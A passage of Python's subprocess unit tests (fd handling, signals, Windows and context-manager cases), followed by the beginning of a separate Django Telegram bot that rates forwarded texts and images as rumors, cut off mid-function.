_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
[sys.executable, "-c", "pass"],
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process; otherwise it can
# be decoded as-is if the default locale is latin-1.
env['LC_ALL'] = 'C'
if sys.platform.startswith("aix"):
# On AIX, the C locale uses the Latin1 encoding
decoded_value = encoded_value.decode("latin1", "surrogateescape")
else:
# On other UNIXes, the C locale uses the ASCII encoding
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(sys.executable)
path, program = os.path.split(sys.executable)
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program, "-c", "pass"])
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'" + abs_program + b"' -c pass"
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program, "-c", "pass"], env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program, "-c", "pass"], env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=())
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & fds_to_keep & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE aftr setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
[sys.executable, "-c", "import sys; sys.exit(0)"],
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
executable_list = "exec" # error: must be a sequence
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, [], cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
stdout=subprocess.PIPE,
close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn(b"physalis", p.stdout.read())
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class CommandTests(unittest.TestCase):
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = set(("list2cmdline",))
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
self.addCleanup(p.stdout.close)
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(FileNotFoundError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
def test_main():
unit_tests = (ProcessTestCase,
POSIXProcessTestCase,
Win32ProcessTestCase,
CommandTests,
ProcessTestCaseNoPoll,
CommandsWithSpaces,
ContextManagerTests,
RunFuncTestCase,
)
support.run_unittest(*unit_tests)
support.reap_children()
if __name__ == "__main__":
unittest.main()
|
telegram.py
|
import io
import json
import time
import telebot
from django.conf import settings
from django.db.models import F
from django.utils.translation import gettext as _
from redis import Redis
from telebot import types
from telebot.handler_backends import RedisHandlerBackend
from telebot.types import Update
from bots.decorators import bot_respects_user_language
from rumors.models import (
Image,
Review,
Text,
TRUTHFULNESS_POINTS_LIE_IS_LESS_THAN_VALUE,
TRUTHFULNESS_POINTS_TRUTH_IS_GREATER_THAN_VALUE,
)
from rumors.utils import get_image_hash, process_image_hash, process_text
redis = Redis.from_url(settings.REDIS_URL)
__redis_handler = RedisHandlerBackend()
__redis_handler.redis = redis
bot = telebot.TeleBot(
settings.TELEGRAM_BOT_TOKEN,
next_step_backend=__redis_handler
)
@bot.message_handler(commands=['help', 'start'])
@bot_respects_user_language
def send_welcome(message):
bot.reply_to(
message=message,
text=_(
"Hi there, I am Veridical BOT.\n"
"I am here to eliminate the rumors around you. 😌\n"
"If you send or forward a message or an image to me, "
"I will check if it is a rumor based on the data I have collected. \n"
"you can also vote on the validity of the judgment I provide. \n"
"This way you'll be able to help build a world with no rumors! ❤️"
),
)
def validate_points(message, content, content_type):
markup = types.ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)
markup.add(_('cancel'), _("vote"))
if 0 < content.truthfulness_points <= TRUTHFULNESS_POINTS_TRUTH_IS_GREATER_THAN_VALUE:
bot.reply_to(
message,
_(
"we're still not sure about this, some people say it's true,"
" but we're not confident about this information yet."
)
)
elif content.truthfulness_points == 0:
bot.reply_to(
message,
_(
"We have no information about the truthfulness of this {content_type},"
" so we classify it as unknown."
).format(content_type=_(content_type))
)
elif content.truthfulness_points < TRUTHFULNESS_POINTS_LIE_IS_LESS_THAN_VALUE:
bot.reply_to(
message,
_("Our data set shows that this {content_type} has"
" no truthfulness, hence it's a rumor.").format(content_type=_(content_type))
)
elif content.truthfulness_points > TRUTHFULNESS_POINTS_TRUTH_IS_GREATER_THAN_VALUE:
bot.reply_to(
message,
_("Our data set shows that this {content_type} is truthful,"
" hence it's not a rumor.").format(content_type=_(content_type))
)
msg = bot.send_message(
chat_id=message.chat.id,
text=_('if you wish to vote on the validity of this {content_type},'
' choose "vote".').format(content_type=_(content_type)),
reply_markup=markup,
)
bot.register_next_step_handler(msg, process_option_step, content_type=content_type)
@bot.message_handler(func=lambda message: True, content_types=['text'])
@bot_respects_user_language
def check_text(message):
chat_id = message.chat.id
text, _ = process_text(message.text)
redis.set(name=str(chat_id) + 'text', value=str(text.id), ex=7200)
validate_points(message, text, 'text')
@bot.message_handler(func=lambda message: True, content_types=['photo'])
@bot_respects_user_language
def check_image(message):
file_path = bot.get_file(message.photo[-1].file_id).file_path
chat_id = message.chat.id
downloaded_img = bot.download_file(file_path)
